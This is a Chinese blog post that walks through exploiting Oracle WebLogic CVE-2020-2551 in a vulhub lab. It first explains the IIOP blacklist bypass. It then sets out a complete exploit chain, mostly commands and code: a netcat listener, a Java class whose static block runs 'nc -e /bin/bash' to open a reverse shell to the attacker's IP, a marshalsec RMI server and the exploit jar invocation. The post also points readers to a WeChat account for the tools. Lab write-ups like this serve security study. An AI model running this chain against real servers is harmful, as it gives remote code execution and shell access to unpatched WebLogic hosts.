首页 > 其他分享 >CVE-2020-2551

CVE-2020-2551

时间:2023-01-11 16:55:43浏览次数:39  
标签:2551 192.168 漏洞 2020 exp CVE

前言

2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。

经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。

环境搭建

直接使用vulhub中的CVE-2017-10271就可以

使用git克隆到本地

git clone https://github.com/vulhub/vulhub.git

图片

进入对应环境

cd vulhub/weblogic/CVE-2017-10271

image-20230107154925407

启动docker漏洞环境

sudo docker-compose up -d

image-20230107155739460

搭建完成以后,访问7001/console如下图所示即为搭建成功

image-20230107160549138

 

检测是否存在漏洞

python3 CVE-2020-2551.py -u http://192.168.52.128:7001/

image-20230107164740702

发现存在漏洞

漏洞利用

攻击机ip:192.168.0.101

靶机ip:192.168.52.128

 

攻击机开启监听nc -lvnp 3333

image-20230107180523151

编写一个exp.java文件:

import java.io.IOException;
public class exp {
       static{
               try {
                       java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","nc -e /bin/bash 192.168.0.101 3333"});
              } catch (IOException e) {
                       e.printStackTrace();
              }
      }
       public static void main(String[] args) {

      }
}

其中"nc -e /bin/bash 192.168.52.130 3333"是要执行的命令

然后进行编译,生成出一个exp.class文件

image-20230107171912137

image-20230107171939453

启一个web服务,需要与exp.class在同一文件夹

image-20230107172232631

使用marshalsec起一个恶意的RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.101/#exp" 1099

image-20230107180020082

然后开始进行攻击,使用命令,成功弹出shell:

java -jar weblogic_CVE_2020_2551.jar 192.168.52.128 7001 rmi://192.168.0.101:1099/exp

image-20230107180754385

下载工具获取私信 微信公众号:助安社区

image-20230107180849525

 

 

 

 

 

标签:2551,192.168,漏洞,2020,exp,CVE
From: https://www.cnblogs.com/sechelper/p/17044256.html

相关文章

  • S2-052 CVE-2017-9805 远程代码执行
    漏洞名称S2-052CVE-2017-9805远程代码执行利用条件Struts2.1.6-Struts2.3.33Struts2.5-Struts2.5.12漏洞原理Struts2REST插件的XStream组件存在反序列化......
  • 2020,Transformation-invariant Gabor convolutional networks
    Introduction深度卷积神经网络(DCNNs)在字符识别、目标检测、人脸识别和语义分割等各个领域都取得了一系列突破。然而,由于缺乏为空间几何变换设计的特定模块,学习到的特征......
  • Bonitasoft认证绕过和RCE漏洞分析及复现(CVE-2022-25237)
    一、漏洞原理漏洞简述Bonitasoft是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita是一个用于业务流程自动化和优化的开源和可扩展......
  • macbook pro更换三星EVO 970 PLUS教程2020年
    macbookpro更换三星EVO970PLUS教程2020年1.买个转接头2.买硬盘三星EVO970PLUS3.买螺丝刀,螺丝刀最好是网上一起买,苹果的那个螺丝刀很难找4.拆机6.下载镜像做USB启动盘8.......
  • re | [羊城杯 2020]babyre
    re|[羊城杯2020]babyrelinuxx64main函数很单纯,藏了一个smc,直接动调dump。signed__int64__fastcallmain(__int64a1,char**a2,char**a3){signedinti;/......
  • P7114 [NOIP2020] 字符串匹配 解题报告
    ~~NOIP的蓝题果然还是好难啊啊啊啊~~前言:作为一道NOIP的真题,这道题放在T2难度并不是特别大,不过考点还是比较偏的,扩展KMP和树状数组的组合,并且还带有一定的思维难度,......
  • S2-017 CVE-2013-2248
    漏洞名称ApacheStruts多个开放重定向漏洞(CVE-2013-2248)s2-017利用条件Struts2.0.0-Struts2.3.15漏洞原理通过操作前缀为“redirect:”/“redirectAction:”的......
  • S2-013 CVE-2013-1966
    漏洞名称S2-013CVE-2013-1966远程命令执行利用条件Struts2.0.0-Struts2.3.14.1漏洞原理Struts2标签中<s:a>和<s:url>都包含一个includeParams属性,可以设......
  • S2-012 CVE-2013-1965
    漏洞名称S2-012(CVE-2013-1965)远程代码执行利用条件StrutsShowcaseApp2.0.0-StrutsShowcaseApp2.3.14.2影响版本:Struts2.1.0-2.3.13漏洞原理如果在配置A......
  • [网鼎杯 2020 白虎组]PicDown
    [网鼎杯2020白虎组]PicDown考点:1、任意文件读取及Linux进程查看 2、python脚本反弹shell进去之后在输入处随便输个啥,发现url有参数,猜测ssrfpage?url=http://www.baidu......